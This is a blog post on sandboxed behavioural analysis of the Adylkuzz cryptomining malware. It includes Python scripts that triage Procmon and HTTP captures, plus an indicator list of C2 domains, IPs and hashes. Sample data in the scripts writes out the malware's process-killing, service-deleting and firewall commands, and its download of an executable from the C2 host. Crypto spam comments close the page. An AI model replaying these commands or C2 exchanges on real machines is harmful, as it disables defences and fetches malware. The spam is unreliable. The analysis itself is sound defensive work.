
Behavioural analysis of Adylkuzz Cryptocurrency Mining Malware

Introduction
This post explains how to execute a malware specimen in a controlled environment (sandbox) to identify indicators of compromise (IOCs). It does not cover the initial infection vector, propagation, or recovery of infected systems.

Adylkuzz CryptoMiner
Adylkuzz is described as malware that infects computers through the same means as WannaCry but, instead of encrypting files, hides in the background and mines cryptocurrency for its operators. It does not touch the user's files and stays behind the scenes. The "symptoms" of infection are loss of access to shared resources on Windows, plus computers and servers running slowly. Once running, Adylkuzz first stops any instances of itself that are already running and blocks SMB communication to prevent further infection. It then determines the public IP address of the victim and downloads the mining instructions, the cryptominer, and cleanup tools.

Disclaimer
  • You are dealing with real malware samples
  • Don't expose them to internal networks or the internet
  • Analyse them in a controlled environment (sandbox)
  • We are not responsible for any consequences or damage if you fail to follow these rules
Binary Hash
MD5:  f2e1d236c5d2c009e1749fc6479a9ede

Tools  
  • Process hacker 
  • Process monitor 
  • Wireshark
  • CaptureBAT
  • Hashmyfiles 
  • Windows 7 VM
Analysis
A Windows 7 virtual machine was set up with all the tools. Process Hacker, Process Monitor, Wireshark and CaptureBAT were started in the background, and the Adylkuzz specimen was then run with admin privileges, since the malware generally obtains admin privileges on a real victim. A quick look at Process Hacker showed that Adylkuzz had been launched by explorer.exe.

Adylkuzz launched many command prompts upon execution, and these could be seen in Process Hacker. As mentioned, the aim is to find indicators of compromise, so Process Monitor and Wireshark are used next to check process creation and network connections.
As shown in Process Hacker, several suspicious processes appeared and were then terminated via command prompt. In Process Monitor (procmon), filter the output with "Operation is Process Create" to spot the initial launch of Adylkuzz by explorer.exe and the sub-processes Adylkuzz then created with command-line arguments. Note that for a Process Create event the Process Name and PID columns belong to the parent; the new child's PID and command line appear in the Detail column.
As shown, explorer.exe launched the Adylkuzz binary, and Adylkuzz then launched a number of sub-processes through cmd.exe. The first thing it did was kill hdmanger.exe and mmc.exe; it also stopped a service called WELM and later deleted it.
New firewall rules were also added via the command line. The most interesting was a rule blocking port 445 (SMB), the port through which the malware arrived. Since this crypto-mining malware consumes all of the computer's resources computing mining hashes, it blocks port 445 so that no other malware can exploit the same vulnerability and compete for the same resources.
As shown below, more processes were killed and more firewall rules were added. Most interestingly, there was some filesystem activity: a few files were created in the TEMP folder and the Fonts directory was accessed (which rarely happens). Another process was also observed running a batch file that pings localhost (pinging localhost is a common way for a batch script to sleep for a few seconds before its next command).
Here is the captured process monitor file for further exploration
procmon file: https://mega.nz/#F!9nxBAKbZ!Uwu73mULkDty8xIG4h-FTg
MD5: e7d69cb1050b25c6ac08fbabfbba6ff4
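To make the Process Monitor step repeatable, here is an added example (my own, not tooling from the original post) that reads a Procmon CSV export, rebuilds the explorer.exe -> adylkuzz.exe -> cmd.exe lineage from the Process Create events, and flags the command lines an analyst would record as IOCs: taskkill, sc stop/delete, netsh firewall rules touching port 445, and batch-file execution. The embedded CSV is constructed to mirror the behaviour described above and is not the author's capture; the process and service names (hdmanger.exe, WELM, 445.bat) come from the post, while the PIDs, paths and exact command-line syntax are assumptions.

```python
"""Triage a Process Monitor CSV export (File > Save..., format CSV) for the
process-creation activity described in the post: the specimen launched by
explorer.exe, its cmd.exe children, and the command lines that kill
processes, stop/delete services and change the firewall.

Added example, not tooling from the original post.  SAMPLE_CSV is
CONSTRUCTED to mirror the described behaviour; process/service names follow
the post, PIDs, paths and command-line syntax are assumed."""
import csv
import io
import re

# Constructed sample in Procmon's default CSV column layout.  For a
# "Process Create" row the Process Name / PID columns are the PARENT; the
# child's PID and command line are in the Detail column.
SAMPLE_CSV = r'''
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","explorer.exe","1320","Process Create","C:\Users\lab\Desktop\adylkuzz.exe","SUCCESS","PID: 2044, Command line: ""C:\Users\lab\Desktop\adylkuzz.exe"""
"10:01:02.5","adylkuzz.exe","2044","Process Create","C:\Windows\System32\cmd.exe","SUCCESS","PID: 2100, Command line: cmd.exe /c taskkill /f /im hdmanger.exe"
"10:01:02.6","adylkuzz.exe","2044","Process Create","C:\Windows\System32\cmd.exe","SUCCESS","PID: 2108, Command line: cmd.exe /c sc stop WELM & sc delete WELM"
"10:01:02.8","adylkuzz.exe","2044","Process Create","C:\Windows\System32\cmd.exe","SUCCESS","PID: 2116, Command line: cmd.exe /c netsh advfirewall firewall add rule name=""block445"" dir=in protocol=tcp localport=445 action=block"
"10:01:03.0","adylkuzz.exe","2044","CreateFile","C:\Users\lab\AppData\Local\Temp\445.bat","SUCCESS","Desired Access: Generic Write"
"10:01:03.1","adylkuzz.exe","2044","Process Create","C:\Windows\System32\cmd.exe","SUCCESS","PID: 2124, Command line: cmd.exe /c C:\Users\lab\AppData\Local\Temp\445.bat"
'''.strip()

# Detail column format Procmon uses for Process Create events.
DETAIL_RE = re.compile(r"PID:\s*(\d+),\s*Command line:\s*(.*)", re.S)

# (tag, pattern) pairs applied to each child command line, in this order.
INDICATORS = [
    ("process kill", re.compile(r"\btaskkill\b", re.I)),
    ("service stop/delete", re.compile(r"\bsc\s+(stop|delete)\b", re.I)),
    ("firewall change", re.compile(r"\bnetsh\s+(advfirewall|firewall)\b", re.I)),
    ("SMB port 445", re.compile(r"\blocalport\s*=\s*445\b", re.I)),
    ("batch file", re.compile(r"\.bat\b", re.I)),
]


def parse_process_creates(csv_text):
    """Return one dict per 'Process Create' row: parent, child PID, image, command line."""
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "Process Create":
            continue
        m = DETAIL_RE.match(row["Detail"])
        if not m:
            continue
        events.append({
            "time": row["Time of Day"],
            "parent": row["Process Name"],
            "parent_pid": int(row["PID"]),
            "child_pid": int(m.group(1)),
            "image": row["Path"],
            "cmdline": m.group(2).strip(),
        })
    return events


def descendants_of(events, image_name):
    """PIDs of every process whose image is image_name, plus everything spawned
    beneath them (transitively), so later filters can be scoped to the specimen."""
    pids = {e["child_pid"] for e in events
            if e["image"].lower().endswith(image_name.lower())}
    grew = True
    while grew:
        grew = False
        for e in events:
            if e["parent_pid"] in pids and e["child_pid"] not in pids:
                pids.add(e["child_pid"])
                grew = True
    return pids


def flag_commands(events, scope=None):
    """Return (tag, cmdline) pairs for command lines matching INDICATORS.
    If scope (a set of parent PIDs) is given, only children of those PIDs count."""
    flagged = []
    for e in events:
        if scope is not None and e["parent_pid"] not in scope:
            continue
        for tag, rx in INDICATORS:
            if rx.search(e["cmdline"]):
                flagged.append((tag, e["cmdline"]))
    return flagged


def print_tree(events, root_pid, depth=0):
    """Print the process tree below root_pid using the recorded parent/child PIDs."""
    for e in events:
        if e["parent_pid"] == root_pid:
            print("  " * depth + f"{e['parent']}[{root_pid}] -> "
                  f"{e['image']} [{e['child_pid']}] :: {e['cmdline']}")
            print_tree(events, e["child_pid"], depth + 1)


if __name__ == "__main__":
    evs = parse_process_creates(SAMPLE_CSV)
    print_tree(evs, evs[0]["parent_pid"])          # start at explorer.exe
    scope = descendants_of(evs, "adylkuzz.exe")   # only the specimen's own children
    for tag, cmd in flag_commands(evs, scope):
        print(f"[{tag}] {cmd}")
```

To run it against the real capture, export the filtered Procmon view as CSV and pass the file contents to parse_process_creates(). Scoping the flags to descendants_of() matters on a busy VM: without it, a legitimate netsh or sc command from some other process would be reported as if the specimen had issued it.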

Meanwhile, a quick look at Wireshark with the filter http.request.method==GET && not udp showed a few interesting HTTP requests carrying command instructions and file downloads.
Follow the TCP stream for GET /install/start HTTP/1.1: the infected host contacted the server to report its presence and received 200 OK.
Follow the TCP stream for the next request, GET /mine.txt: the infected host received 200 OK with a set of crypto-mining instructions.
In the next GET request the malware pulled a binary, 64.exe, from the server and then sent back a report with system information such as the architecture, CPU frequency, CPU count and memory. This lets the malware authors know what type of system was infected and what resources are available for mining.
The response to the previous request contained the location of a Lua script, which was fetched in the next GET request. The malware was also seen pulling a further binary from the server and requesting mine.txt again for the mining instructions.
All HTTP objects were extracted in Wireshark via File --> Export Objects --> HTTP.

Pcap:  https://mega.nz/#!tnQwjCTD!0Ej9db8JMbmB6GAmVMJpoFVYUuLVaV0KZCKlUO5RTS8
MD5: 34723c7c5c54d6ff22cad74c7921c937
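The Wireshark steps above (follow the stream, read each request/response pair, export the objects, hash them with HashMyFiles) can be scripted once the two directions of the conversation are available as raw bytes. The following is an added example of my own, not code from the original post: it splits each direction into HTTP/1.1 messages by Content-Length, pairs requests with responses, MD5-hashes every returned object, recognises downloaded PE files by their MZ magic, decodes the system report the miner POSTs back, and produces the hosts, URLs and hashes for the IOC list. The host name and the /install/start, /mine.txt and /64.exe requests follow the post; the report URI /install/report, all headers and every body (the mining instructions, the PE stub, the report fields) are constructed placeholders and not the contents of the author's pcap.

```python
"""Reconstruct HTTP transactions from one TCP conversation (the two
directions as Wireshark's Follow TCP Stream shows them), pair requests with
responses, hash every returned object and collect network IOCs.

Added example, not code from the original post.  HOST and the three GET
paths follow the post; /install/report, all headers and all bodies are
CONSTRUCTED placeholders."""
import hashlib
from urllib.parse import parse_qs


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def http_message(start_line, headers, body=b""):
    """Serialise one HTTP/1.1 message, adding Content-Length when there is a body."""
    hdrs = dict(headers)
    if body:
        hdrs["Content-Length"] = str(len(body))
    head = start_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in hdrs.items())
    return head.encode() + b"\r\n" + body


HOST = "08.super5566.com"                                    # from the post's IOC list
MINE_TXT = b"pool=stratum+tcp://pool.example:3333\nthreads=all\n"  # constructed
PE_SAMPLE = b"MZ\x90\x00" + b"\x00" * 60                     # constructed DOS-header stub
REPORT = b"arch=x64&cpu_mhz=2400&cpus=2&mem_mb=4096"         # constructed report

# Client -> server direction of the stream (constructed).
CLIENT_STREAM = (
    http_message("GET /install/start HTTP/1.1", {"Host": HOST, "User-Agent": "Mozilla/4.0"})
    + http_message("GET /mine.txt HTTP/1.1", {"Host": HOST})
    + http_message("GET /64.exe HTTP/1.1", {"Host": HOST})
    + http_message("POST /install/report HTTP/1.1",
                   {"Host": HOST, "Content-Type": "application/x-www-form-urlencoded"},
                   REPORT)
)
# Server -> client direction (constructed).
SERVER_STREAM = (
    http_message("HTTP/1.1 200 OK", {"Content-Type": "text/html"}, b"ok")
    + http_message("HTTP/1.1 200 OK", {"Content-Type": "text/plain"}, MINE_TXT)
    + http_message("HTTP/1.1 200 OK", {"Content-Type": "application/octet-stream"}, PE_SAMPLE)
    + http_message("HTTP/1.1 200 OK", {"Content-Type": "text/html"})
)


def split_http_messages(stream):
    """Split one direction of a TCP stream into HTTP messages.  Bodies are
    delimited by Content-Length only (no chunked encoding); a message with no
    Content-Length ends at the blank line after its headers."""
    messages, pos = [], 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + 4
        length = int(headers.get("content-length", "0"))
        messages.append({"start": lines[0], "headers": headers,
                         "body": stream[body_start:body_start + length]})
        pos = body_start + length
    return messages


def pair_transactions(client_stream, server_stream):
    """Pair requests with responses in order (keep-alive, no pipelining
    reordering) and summarise each object the server returned."""
    requests = split_http_messages(client_stream)
    responses = split_http_messages(server_stream)
    transactions = []
    for req, resp in zip(requests, responses):
        method, uri, _ = req["start"].split(" ", 2)
        transactions.append({
            "method": method,
            "host": req["headers"].get("host", ""),
            "uri": uri,
            "status": int(resp["start"].split(" ")[1]),
            "content_type": resp["headers"].get("content-type", ""),
            "size": len(resp["body"]),
            "md5": md5_hex(resp["body"]),
            "is_pe": resp["body"].startswith(b"MZ"),   # PE files start with the DOS 'MZ' magic
            "request_body": req["body"],
        })
    return transactions


def extract_iocs(transactions):
    """Hosts, full URLs and MD5s of downloaded executables, ready for the IOC list."""
    return {
        "hosts": sorted({t["host"] for t in transactions}),
        "urls": [f"http://{t['host']}{t['uri']}" for t in transactions],
        "pe_md5": [t["md5"] for t in transactions if t["is_pe"]],
    }


def parse_report(transaction):
    """Decode the form-encoded system report the miner POSTs back to the server."""
    return {k: v[0] for k, v in parse_qs(transaction["request_body"].decode()).items()}


if __name__ == "__main__":
    txs = pair_transactions(CLIENT_STREAM, SERVER_STREAM)
    for t in txs:
        print(f"{t['method']} {t['uri']} -> {t['status']} {t['content_type']} "
              f"{t['size']}B md5={t['md5']}{' [PE]' if t['is_pe'] else ''}")
    print(extract_iocs(txs))
    print(parse_report(txs[3]))
```

On a real capture, feed split_http_messages() the raw bytes of each direction (Follow TCP Stream, select one direction, "Show data as Raw", save) rather than the mixed view; the pairing is positional, so it only holds for a single keep-alive connection without pipelining, which is what these plain GET/POST exchanges are.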

It was evident that Adylkuzz consumes all available resources. It also detects the presence of Task Manager (taskmgr.exe): while taskmgr.exe is running, the miner backs off so that Task Manager shows normal system usage.

As shown below, Adylkuzz shows different system usage while taskmgr.exe is running in the background.

A quick look at the CaptureBAT output shows the created, modified and deleted files.
Adylkuzz created a log file for its crypto-mining operations.

Indicators of Compromise 
  • 08.super5566.com
  • aa1.super5566.com
  • 107.170.200.222
  • 1.32.192.16 
  • 07.lua
  • 445.bat
  • 445.exe
  • 86.exe
  • msiexev.exe
  • mine.txt
  • s1f0.1_.exe
  • s1f0._Miner_.log
  • 5e97bc06c438d9c393e67591029ee1e4
  • 0711b1d7523f0e02be2505f2e0b39fae
  • 2d001c3d5e3509a7e7d4a72aa6e423ce
  • 4557e4533a41c8e36a347450f4b58a76
  • d8f508c5af84df89d73ae9c4173c1cdb
  • 6343af71615d2f1c51f654863f6136f2
Disclaimer: These IPs may be subject to change in future.


This is just an explanatory post to leverage basic dynamic malware analysis to find indicators of compromise

Comments

  1. This information which you have shared here about Cryptocurrency Mining is meaningful and magnificent. I am impressed by the details that you have shared in this post and it reveals how well you understand this subject. I would like to thank you for sharing this article here. Crypto Loan Calculator Online

  2. The trading sessions of Bitcoin will last as long as the user wants. So experts advise new users to identify the peak trading period in their countries and trade at that time.

  3. I changed into amazingly curious about the article. It's moving I need to yield. I like visiting your site page on record that I by and large occur in the wake of refreshing articles like this one. How to sell bitcoin in Canada


